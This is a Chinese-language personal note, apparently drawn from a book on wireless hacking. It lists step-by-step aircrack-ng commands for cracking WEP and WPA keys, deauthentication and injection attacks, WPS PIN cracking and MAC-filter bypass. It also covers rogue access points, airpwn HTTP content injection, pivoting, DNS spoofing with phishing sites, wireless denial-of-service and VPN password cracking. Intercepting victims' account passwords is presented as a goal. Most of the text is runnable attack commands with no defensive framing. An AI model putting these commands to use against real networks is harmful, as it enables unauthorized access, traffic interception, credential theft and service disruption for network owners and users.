雖然無線破解早就爛大街了,還是去圖書館把這本書補上了,做個筆記,以供以后參考,記得很全面但很亂。測試環境為Kali linux 或backtrack
wep破解
1.將網卡激活成monitor模式
airmon-ng start wlan0 6
2.開始抓取無線數據包:
airodump-ng -w ciw.cap --channel 6 mon0
3.為了加快IV(初始化向量)的獲取,可以進行ArpRequest注入式攻擊,可以有效提高抓包數量及破解速度:
aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 wlan0
參數解釋:
* -3,指的是采取ArpRequest注入攻擊方式;
* -b,后面跟上要入侵的AP的MAC地址;
* -h,建議使用,效果會更好,后面跟的是監測到的客戶端MAC地址;
* -x num,指的是定義每秒發送數據包數量,這個num值可以根據實際情況調小一些,但一般來說最高1024就可以
4.開啟aircrack-ng來進行同步破解:
aircrack-ng -x -f 2 ciw.cap
參數解釋:
* -x,是暴力破解模式;
* -f,指啟用密碼復雜度為2;
1.啟動無線網卡的監聽模式
$ sudo airmon-ng start wlan0
2. 查看有哪些采用wep加密的路由器,記錄目標ap的mac
$ sudo airodump-ng mon0
3. 另開一個終端,運行
$ sudo airodump-ng -c 6 --bssid AP’s MAC -w wep mon0
其中6是AP的信道(channel),AP’sMAC是路由器的MAC地址,wep的是抓下來的數據包保存的文件名
4. 再另開一個終端,與AP建立虛擬連接
$ sudo aireplay-ng -1 0 -a AP’s MAC -h My-MAC mon0
5. 建立虛擬連接成功后,運行下面命令,加速數據獲取
$ sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My-MAC mon0
6. 收集5000個以上的DATA之后,開始進行解密 。另開一個終端,運行
$ sudo aircrack-ng wep*.cap
如果暫時沒算出來的話,繼續等,aircrack-ng 會在DATA每增加5000個之后自動再次運行,直到算出密碼為止
7. 破解成功后,關閉監控模式
$ sudo airmon-ng stop mon0
自動攻擊工具:wep spoonfeeder
Deauth驗證攻擊,這個對於采用WPA驗證的AP攻擊都會用到,可以迫使AP重新與客戶端進行握手驗證,從而使得截獲成為可能。命令如下
aireplay-ng -0 10 -a AP's MAC mon0
或者
aireplay-ng -0 10 -a AP's MAC -h Client's MAC mon0
-0指的是采取Deautenticate攻擊方式,后面為發送次數,-a后面跟上要入侵的AP的MAC地址,-h建議還是使用,效果會更好,這個后面跟的是監測到的客戶端MAC地址
wep破解的多米諾骨牌
1.無客戶端chopchop攻擊
1.airodump-ng --ivs -c 6 -w file mon0 捕獲數據
2.aireplay-ng -l 0 -e AP'ESSID -a AP'MAC -h CLIENT'MAC mon0
FakeAuth:與ap建立虛擬的驗證連接,以便之后注入數據包
-h 用於攻擊的網卡mac
3.aireplay-ng -4 -b AP'MAC -h CLIENT'MAC mon0
-4 chopchop攻擊,生成密鑰數據流文件 -h 攻擊者自己的mac
生成明文后綴為cap和密鑰數據流后綴xor文件
4.tcpdump -s 0 -n -e -r replay_dec.cap
-s 從每個報文截取snaplen字節的數據
-n 不進行ip地址到主機名的轉換
-e 在輸出行打印數據鏈路層頭部信息
-r 從文件讀取包
5.packetforge-ng -0 -a AP'MAC -h CLIENT'MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment xor file -w writetofile
-0 創建一個arp包
-k ip目標ip及端口
-l ip 來源ip及端口
-y file,從文件讀取prga數據
-w file 將生成的數據報文寫入cap文件
6.aireplay-ng -2 -r writetofile mon0
為加快iv(初始化向量)獲取,進行Interactive Attack及交互式攻擊,將構造的數據包發送至目標ap
7.aircrack-ng chop*ivs
破解密碼
2.無客戶端Fragment攻擊
1.捕獲
2.FakeAuth,虛假驗證,監聽界面會出現偽造的客戶端
3.aireplay-ng -5 -b AP'MAC -h CLIENT'MAC mon0
-5 fragment攻擊,生成可用密鑰數據流文件
-h 攻擊者自己的網卡mac
4.packetforge-ng 構造注入數據包
5.文件生成后,同時進行InteractiveAttack攻擊,在airodump下可看到數據飛漲
6.aircrack
3.無客戶端ARP+Deauth攻擊
1.airodump-ng -w file --channel 6 mon0
2.aireplay-ng -l 0 -e AP'ESSID -a AP'MAC -a FakeMac mon0
fakeauth攻擊
3.aireplay-ng -l 6000 -o 1 -q 10 -e AP'ESSID -a AP'MAC -h ATTK'MAC
保證偽造客戶端在線
-l delay 延遲數量
-o 每次發送數據包數量
-q sec 發送keep-alives數據包時間間隔
-e 目標ssid
4.aireplay-ng -3 -b AP'MAC -h CLIENT'MAC mon0
-3 同時進行arp注入攻擊
5.aircrack-ng -n 152 file
152為wep破解
共享密鑰的wep破解
1.監聽模式
2.抓包,若客戶端沒有活動,則deauth攻擊,aireplay-ng -0 1 -a AP'MAC mon0
可看到CIPHER欄出現ska標識,右上角出現keystream提示
生成三個文件a.mac.xor, a.cap, a.txt. xor文件為包含預共享密鑰的文件
3.fakeauth攻擊。
aireplay-ng -1 0 -e AP'ESSID -y a.xor -a AP'MAC -h FAKEMAC mon0
-1 ,fakeauth模式
-h,客戶端mac或偽造mac
4.可同時進行ArpRequest注入攻擊,進行完fakeauth攻擊后,此時aireplay監聽界面截獲的ARP request數據為0,可再次進行deauth攻擊使其重連。
5.aircrack-ng filename
關閉ssid廣播的對策
1,抓包分析
2,暴力破解
3,deauth攻擊
1.airodump探測,關閉ssid的ap只顯示ssid的長度
2.deauth使其重連
3,監聽界面出現ssid
突破mac地址過濾
1.獲取合法客戶端mac地址,airodump、omnipeek、kismet
2.更改mac地址偽造身份。win下用smac,linux下ifconfig wlan0 hw ether MAC 或 athmacchange.sh
3.重新裝載網卡,連接ap
數據分析
1.查看ap品牌
2.查看對方訪問網站,觀察目標習慣,深入攻擊
3.截獲郵箱等賬戶密碼
破解wpa
一、傳統wpa-psk破解
1、2、3.激活網卡,設為monitor模式,捕獲數據
4.aireplay-ng -0 1 -a AP'MAC -c CLIENT'MAC wlan0? Deauth攻擊獲取wpa握手報文
5.aircrack-ng -w dic filename.cap 破解密碼
Deauth數據包將以連接至無線路由器的合法無線客戶端強制斷開,客戶端重連,便可以捕獲握手包。
-0 之后跟上攻擊次數,可根據情況5~10不等;
如果成功,在airodump-ng界面右上角可以看到“wpa handshake"的提示。
-w 后跟字典名。
二、wpa pmk hash破解
內存-時間平衡。 彩虹表。wpa rainbow tables. wpa pmk hash tables.
關於aircrack-ng
主要組件
aircrack-ng 自動檢測數據包,恢復密碼
airmon-ng 改變無線網卡模式
aiodump-ng 捕獲802.11數據
aireplay-ng 創建特殊的數據報文及流量
airserv-ng 將無線網卡連接至某一特定端口
airolib-ng 進行wpa rainbow table攻擊時使用,用於建立特定數據庫文件
airdecap-ng 解開處於加密狀態的數據包
airdriver-ng 顯示支持的網卡
airdecloak-ng 過濾出指定的數據
packetforge-ng 為注入攻擊制作特殊加密報文,主要用於無客戶端破解攻擊
wesside-ng 自動wep破解工具,加入fragmentation攻擊
tkiptun-ng 針對wpa tkip加密且啟用qos的網絡
(A) airdecap-ng
airdecap-ng -l -e AP'essid -p AP'password filename.cap
-l 不移除802.11 header部分,防止加密后的文件不可讀
對於wep包
airdecap-ng -w AP'password filename.cap
-w 后跟wep十六進制密碼
解密后可用wireshark分析
(B)ivstools
合並ivs文件:
ivstools --merge 1.ivs 2.ivs 3.ivs out.ivs
轉換cap問ivs
ivstools --convert test.cap test.ivs
(C)airdrive-ng
airdrive-ng supported 查看支持芯片
airdrive-ng detail 序號 詳細
airdrive-ng installed 已安裝驅動
(D)airdecloak-ng
airdecloak-ng --bssid AP'MAC --filters signal -i 無線報文filename.cap
--filters 過濾選項,跟具體參數
完成后,會保存為后綴名為filtered的pcap文件。
關於wesside-ng
自動破解wep的工具.找出當前連接該無線網絡的其他客戶端mac,進行身份欺騙,使用類似fragmentation攻擊方式,攔截廣播及轉發數據包,發現prga數據包。注入arp數據報,調用aircrack-ng PTW破解密碼。
1.ifconfig wlan0 up
2.airmon-ng start wlan0
3.airodump-ng mon0
4.wesside-ng -v AP'MAC -k 1 -i mon0
-k 重傳次數,跟具體數值
捕獲數據包保存在wep.cap的文件,可用aircrack-ng對該文件再次破解。
關於tkiptun-ng. 破解wpa
可以解開tkip加密了的數據包,並不是算出密鑰。
1.安裝
2.激活無線網卡,設為監聽模式
3.tkiptun-ng -a AP'MAC -h CLIENT'MAC mon0 或
tkiptun-ng -a AP'MAC -h CLIENT'MAC -m 80 -n 100 mon0
-m 最小包長度
-n 最大包長度
wps破解wpa/wpa2的捷徑
1.將網卡設為監聽模式
2../wpscan.py -i mon0 掃描開啟wps功能的無線設備
3../wpspy.py -i mon0 -e AP'SSID 監測wps狀態,是否為已配置
4.打開無線網卡自帶配置工具,pin碼連接,使用星號查看器查看密碼
csrf攻擊
現在也可以用reaver跑pin碼
關於GPU破解
CUDA
1.獲取wpa-psk握手數據包,工具(airodump-ng,omnipeek,commview for wifi,airdefense)
2.打開ewsa,cpu、gpu、dictionary設置
3.import tcpdump file導入握手包,cap、pcap、dmp等
4.開始破解
5.未注冊版本只顯示兩位密碼,用winhex查看內存。“工具”--“打開ram內存”--找到ewsa的進程,--“find text“,輸入破解的前兩位密碼,編碼模式為”ascii/code“
關於分布式破解
free rainbow tables項目、ZerOne團隊分布破解項目
cowpatty破解wpa
1.分析抓獲的wpa握手包數據
2.cowpatty -f passd.txt -r wpa.cap -s AP'ESSID -v
-f,后跟字典
-r,抓包文件
table破解
1.genpmk -f wordlist1.txt -d tablename -s AP'ESSID
-f 字典
-d 生成的table文件名
2.cowpatty -d tablename -r a.cap -s AP'ESSID
1.airolib-ng test init
test 要建立的數據庫
init 建立數據庫的命令
2.airolib-ng test import cowpatty tablename
導入預運算tables
3.airolib-ng database stats
查看數據庫狀態
4.aircrack-ng -r test capturefile
無線欺騙攻擊
偽造ap
1基於硬件的偽造ap。 刷新無線路由firmware,dd-wrt ,openwrt, AirSnarf
2.基於軟件的偽造ap
fakeAP
fakeap.pl --interface 網卡名 --channel 頻道 --essid AP'SSID --mac AP'MAC
--essid zunzhe008 --interface wlan0
如不必需,可省略mac
airbase-ng
基於上軟件的自動化腳本mitmap.sh
./mitmap.sh -m ap -i wlan0 -o eth0 -s AP'SSID
-m 跟四種模式之一
-o 跟有線網卡名,一定要先配置完畢,確保能連接外網
-s 偽造ap的ssid,一般和預偽造目標一致
會將捕獲數據保存在當前目錄.cap文件
airpwn
下載解壓 tar zxvf airpwn
cd airpwn
tar zxvf lorcon-current.tgz
cd lorcon
configure&&make&&make install
cd .. && configure && make
(libpcre庫)
缺少文件:cp /usr/local/lib/liborcon-1.0.0.so /usr/lib
破解網絡之后進行欺騙
注入配置文件:在airpwn主目錄下
conf目錄下,編寫名為zerone.html的文件
內容:
begin zerone_html
match ^(GET|POST)
ignore ^GET [^ ?]+\.(jpg|jepg|gif|png|tif|tiff)
response content/zerone_html
只要出現GET或POST請求報文,就將其中網址替換成content目錄下的zerone_html
content目錄下編寫zerone_html文件
HTTP/1.1 200 OK
Connection: close
Content-type: text/html
<html><head><title>hack you!!1</title></head>
<body><img src='http://xxxxxxx' width='100%' height='100%'>
</head><body onLoad="alert();">
攻擊前注意airpwn支持的網卡
airpwn -c conf/zerone_html -i rausb0 -d rt73 -vvv -F -k WEP
-c 制定配置文件
-d 跟支持的無線網卡驅動名稱
-F 假設設置為監聽模式的網卡中沒有FCS values?
-k wep的16進制密碼
連接請求網址驗證效果
搜索發現偽造ap:
namp -vv -sS 192.168.1.0/24 -p 80
-sS 采用SYN掃描,在有防火牆時常用
nmap -vv -sV 192.168.1.1 -p 80
-sV 具體版本識別,對端口服務信息探測時使用
收斂法向量法定位ap
MITM:
Monkey-jack
無線跳板攻擊
airserv-ng
1.在跳板機1上安裝airserv-ng,將網卡設置為提供無線網卡遠程訪問的服務器
airserv-ng -d 網卡 -p 端口 其他計算機只要連接到這個端口就可以使用此網卡
2.配置端口重定向工具
fpipe -l port -r port IP
-l 監聽本地某個端口
-r 轉發至某個端口,可以是本機
其他跳板也是如此,一般各跳板端口不同,減少暴露
3,遠程攻擊
airodump-ng IP:port
常見錯誤:address already in use,由已開啟airserv-ng網絡網卡服務並用默認666端口所致,修改端口或停止相應airserv
icmp協議隧道
loki
http協議隧道
GNU HTTPTunnel, HTTP Tunnel
偽造站點+dns欺騙
1.偽造站點
2.dns欺騙
3.查看效果,ping域名,顯示內網ip
偽造電子郵件+偽造站點
1.截獲郵箱帳號
2.建立偽造站點
3.受害者收到偽造電子郵件,包含域名相似的偽造站點
無線DOS攻擊
關聯及認證狀態:
state1.未通過驗證,未建立關聯
state2.通過驗證,未建立關聯
state3.通過驗證,建立關聯
Access Point Overload , 無線接入點過載攻擊
--只要客戶端關聯表達到飽和程度,接入點就會開始拒絕新的關聯請求,這種狀態為接入點過載。
Authentication Flood , 身份驗證洪水攻擊
--大量偽造的身份驗證請求超過所能承受的能力時,ap將斷開其他無線服務連接。
Authentication Failure , 身份驗證失敗攻擊
--注入無效身份驗證請求幀,使ap與客戶端的連接中斷
Deauthentication Flood , 取消身份驗證洪水攻擊、驗證阻斷洪水攻擊
--偽造deauthentication幀,注入,踢出合法客戶端
Association Flood , 關聯洪水攻擊、關聯淹沒攻擊
--對於開放身份驗證。偽造關聯,填充連接狀態表。攻擊工作在鏈路層
Disassociation Flood , 取消關聯洪水攻擊
--取消關聯廣播多用於配合中間人攻擊,而這個常用於目標確定的p2p dos
Duration Attack , 持續時間攻擊
--發送占用巨大持續時間值的幀,使其他節點等待
Wireless Adapter Driver Buffer Overflow, 無線網卡驅動溢出攻擊
1.網卡漏洞檢測工具
WiFi DEnum
2.網絡資源,WVE,AusCERT,Milw0rm.com
3.攻擊實現工具
metasploit framework
RF Jamming, 射頻干擾攻擊
--全頻道阻塞、瞄准式阻塞
無線vpn破解
1.掃描vpn設備
namp、zenmap
2.截獲vpn交互數據包
中間人攻擊,ettercap、cain
3.破解
asleap:用於pptp/leap密碼恢復
genkeys:將普通字典裝換成asleap可識別的dat和idx專用hash文件
genkeys -r dict -f simple.dat -n simple.idx
-r 事先准備的字典
-f 預制作的dat格式hash文件
-n 預制作的idx格式hash文件
asleap -r shark -f simple.dat -n simple.idx
-r 截獲的vpn客戶端登錄數據包
1.IPSecScan掃描啟用ipsec的設備
ipsecscan ip
2.確認vpn設備
ike-scan --sport=0 -M ip
--sport=<port> 設置udp源端口,默認500,隨機端口為0.
-M 將結果逐行顯示
--showbackoff vpn指紋識別
ike-scan --sport=0 --showbackoff -M ip 探測vpn操作系統或設備版本
3.基於截獲數據cain破解